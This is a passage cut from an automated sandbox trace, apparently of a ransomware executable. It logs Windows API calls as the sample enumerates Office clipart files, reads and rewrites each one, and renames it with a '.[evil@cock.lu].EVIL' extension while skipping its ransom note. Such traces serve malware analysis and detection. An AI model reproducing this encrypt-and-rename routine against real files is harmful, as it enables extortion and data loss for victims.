Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01637_.wmf.[evil@cock.lu].evil")) returned 1 [0114.289] ??_V@YAXPEAX@Z () returned 0x1 [0114.292] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01637_.WMF", dwFileAttributes=0x200) returned 0 [0114.292] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0114.292] wcsstr (_Str="BS01638_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0114.292] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 69 [0114.292] wcscmp (_String1="BS01638_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0114.292] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BS01638_.WMF") returned 0x0 [0114.292] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF") returned 0x45 [0114.292] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01638_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0114.294] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x292a, lpOverlapped=0x0) returned 1 [0114.307] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.307] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.307] _errno () returned 0x84b1160840 [0114.307] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.307] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e27040*, nNumberOfBytesToWrite=0x2940, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e27040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2940, lpOverlapped=0x0) returned 1 [0114.307] CloseHandle (hObject=0x1a8) returned 1 [0114.307] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0114.307] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0114.307] __uncaught_exception () returned 0x84b1160800 [0114.307] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0114.308] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01638_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01638_.wmf.[evil@cock.lu].evil")) returned 1 [0114.308] ??_V@YAXPEAX@Z () returned 0x1 [0114.311] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01638_.WMF", dwFileAttributes=0x200) returned 0 [0114.311] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0114.311] wcsstr (_Str="BS01639_.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0114.311] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 69 [0114.311] wcscmp (_String1="BS01639_.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0114.311] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="BS01639_.WMF") returned 0x0 [0114.311] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF") returned 0x45 [0114.311] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01639_.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0114.313] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x108c, lpOverlapped=0x0) returned 1 [0114.394] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.394] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.394] _errno () returned 0x84b1160840 [0114.394] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.394] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2c040*, nNumberOfBytesToWrite=0x10a0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2c040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x10a0, lpOverlapped=0x0) returned 1 [0114.394] CloseHandle (hObject=0x1a8) returned 1 [0114.395] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0114.395] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0114.395] __uncaught_exception () returned 0x84b1160800 [0114.395] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0114.395] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01639_.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\bs01639_.wmf.[evil@cock.lu].evil")) returned 1 [0114.396] ??_V@YAXPEAX@Z () returned 0x1 [0114.399] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\BS01639_.WMF", dwFileAttributes=0x200) returned 0 [0114.399] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0114.399] wcsstr (_Str="CARBN_01.MID", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0114.399] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 69 [0114.399] wcscmp (_String1="CARBN_01.MID", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0114.399] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="CARBN_01.MID") returned 0x0 [0114.399] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CARBN_01.MID") returned 0x45 [0114.399] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CARBN_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\carbn_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0114.401] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x246a, lpOverlapped=0x0) returned 1 [0114.408] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.408] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.408] _errno () returned 0x84b1160840 [0114.408] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.408] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x2480, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x2480, lpOverlapped=0x0) returned 1 [0114.408] CloseHandle (hObject=0x1a8) returned 1 [0114.408] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CARBN_01.MID", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0114.408] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0114.409] __uncaught_exception () returned 0x84b1160800 [0114.409] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0114.409] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CARBN_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\carbn_01.mid"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CARBN_01.MID.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\carbn_01.mid.[evil@cock.lu].evil")) returned 1 [0114.410] ??_V@YAXPEAX@Z () returned 0x1 [0114.413] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CARBN_01.MID", dwFileAttributes=0x200) returned 0 [0114.413] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0114.413] wcsstr (_Str="CG1606.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0114.413] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF") returned 67 [0114.413] wcscmp (_String1="CG1606.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0114.413] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="CG1606.WMF") returned 0x0 [0114.413] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF") returned 0x43 [0114.413] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cg1606.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0114.415] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0xdec, lpOverlapped=0x0) returned 1 [0114.433] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.433] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.433] _errno () returned 0x84b1160840 [0114.433] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.433] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0xe00, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0xe00, lpOverlapped=0x0) returned 1 [0114.433] CloseHandle (hObject=0x1a8) returned 1 [0114.434] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0114.434] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0114.434] __uncaught_exception () returned 0x84b1160800 [0114.434] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0114.434] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cg1606.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cg1606.wmf.[evil@cock.lu].evil")) returned 1 [0114.435] ??_V@YAXPEAX@Z () returned 0x1 [0114.437] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CG1606.WMF", dwFileAttributes=0x200) returned 0 [0114.437] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0114.438] wcsstr (_Str="CLASSIC1.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0114.438] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 69 [0114.438] wcscmp (_String1="CLASSIC1.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0114.438] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="CLASSIC1.WMF") returned 0x0 [0114.438] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF") returned 0x45 [0114.438] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\classic1.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0114.439] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x976, lpOverlapped=0x0) returned 1 [0114.446] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.446] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.446] _errno () returned 0x84b1160840 [0114.446] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.446] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2b040*, nNumberOfBytesToWrite=0x980, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2b040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x980, lpOverlapped=0x0) returned 1 [0114.446] CloseHandle (hObject=0x1a8) returned 1 [0114.446] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0114.446] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0114.447] __uncaught_exception () returned 0x84b1160800 [0114.447] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0114.447] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\classic1.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\classic1.wmf.[evil@cock.lu].evil")) returned 1 [0114.449] ??_V@YAXPEAX@Z () returned 0x1 [0114.452] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC1.WMF", dwFileAttributes=0x200) returned 0 [0114.452] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0114.452] wcsstr (_Str="CLASSIC2.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0114.452] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 69 [0114.452] wcscmp (_String1="CLASSIC2.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0114.452] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="CLASSIC2.WMF") returned 0x0 [0114.452] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF") returned 0x45 [0114.452] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\classic2.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0114.454] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8d6, lpOverlapped=0x0) returned 1 [0114.475] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.475] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.475] _errno () returned 0x84b1160840 [0114.475] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.475] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e29040*, nNumberOfBytesToWrite=0x8e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e29040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x8e0, lpOverlapped=0x0) returned 1 [0114.475] CloseHandle (hObject=0x1a8) returned 1 [0114.475] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0114.475] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0114.476] __uncaught_exception () returned 0x84b1160800 [0114.476] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0114.476] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\classic2.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\classic2.wmf.[evil@cock.lu].evil")) returned 1 [0114.476] ??_V@YAXPEAX@Z () returned 0x1 [0114.479] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLASSIC2.WMF", dwFileAttributes=0x200) returned 0 [0114.479] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0114.479] wcsstr (_Str="CLIP.WMF", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0114.479] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF") returned 65 [0114.479] wcscmp (_String1="CLIP.WMF", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0114.479] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="CLIP.WMF") returned 0x0 [0114.479] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF") returned 0x41 [0114.479] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\clip.wmf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0114.485] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x8d6, lpOverlapped=0x0) returned 1 [0114.507] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.507] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.507] _errno () returned 0x84b1160840 [0114.507] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.507] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e26040*, nNumberOfBytesToWrite=0x8e0, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e26040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x8e0, lpOverlapped=0x0) returned 1 [0114.507] CloseHandle (hObject=0x1a8) returned 1 [0114.507] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0114.508] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0114.508] __uncaught_exception () returned 0x84b1160800 [0114.508] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0114.508] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\clip.wmf"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\clip.wmf.[evil@cock.lu].evil")) returned 1 [0114.508] ??_V@YAXPEAX@Z () returned 0x1 [0114.511] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CLIP.WMF", dwFileAttributes=0x200) returned 0 [0114.511] FindNextFileW (in: hFindFile=0x84b11dd980, lpFindFileData=0x84b0fdda00 | out: lpFindFileData=0x84b0fdda00) returned 1 [0114.511] wcsstr (_Str="CMNTY_01.MID", _SubStr=".[evil@cock.lu].EVIL") returned 0x0 [0114.511] _snwprintf (in: _Dest=0x84b0fddc50, _Count=0x104, _Format="%s\\%s" | out: _Dest="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 69 [0114.511] wcscmp (_String1="CMNTY_01.MID", _String2="!_HOW_RECOVERY_FILES_!.txt") returned 1 [0114.511] wcsstr (_Str="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\f3c7a8dc83493b7257a705843ba350e171572666483de057f85f92da510f0eba.exe", _SubStr="CMNTY_01.MID") returned 0x0 [0114.511] wcslen (_String="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CMNTY_01.MID") returned 0x45 [0114.511] CreateFileW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CMNTY_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cmnty_01.mid"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x1a8 [0114.513] ReadFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesRead=0x84b0fdd7a0*=0x1b3a, lpOverlapped=0x0) returned 1 [0114.589] ??8type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.589] ??9type_info@@QEBAHAEBV0@@Z () returned 0x0 [0114.589] _errno () returned 0x84b1160840 [0114.589] SetFilePointer (in: hFile=0x1a8, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0114.590] WriteFile (in: hFile=0x1a8, lpBuffer=0x84b2e2a040*, nNumberOfBytesToWrite=0x1b40, lpNumberOfBytesWritten=0x84b0fdd7a0, lpOverlapped=0x0 | out: lpBuffer=0x84b2e2a040*, lpNumberOfBytesWritten=0x84b0fdd7a0*=0x1b40, lpOverlapped=0x0) returned 1 [0114.590] CloseHandle (hObject=0x1a8) returned 1 [0114.590] _wfsopen (_FileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CMNTY_01.MID", _Mode="a", _ShFlag=64) returned 0x7ffc020ee2a0 [0114.590] fputc (in: _Ch=51, _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 51 [0114.590] __uncaught_exception () returned 0x84b1160800 [0114.590] fclose (in: _File=0x7ffc020ee2a0 | out: _File=0x7ffc020ee2a0) returned 0 [0114.590] MoveFileW (lpExistingFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CMNTY_01.MID" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cmnty_01.mid"), lpNewFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CMNTY_01.MID.[evil@cock.lu].EVIL" (normalized: "c:\\program files\\microsoft office\\root\\clipart\\pub60cor\\cmnty_01.mid.[evil@cock.lu].evil")) returned 1 [0114.591] ??_V@YAXPEAX@Z () returned 0x1 [0114.593] SetFileAttributesW (lpFileName="C:\\\\Program Files\\Microsoft Office\\root\\CLIPART\\PUB60COR\\CMNTY_01.MID", dwFileAttributes=0x200) returned 0 [0114.594] 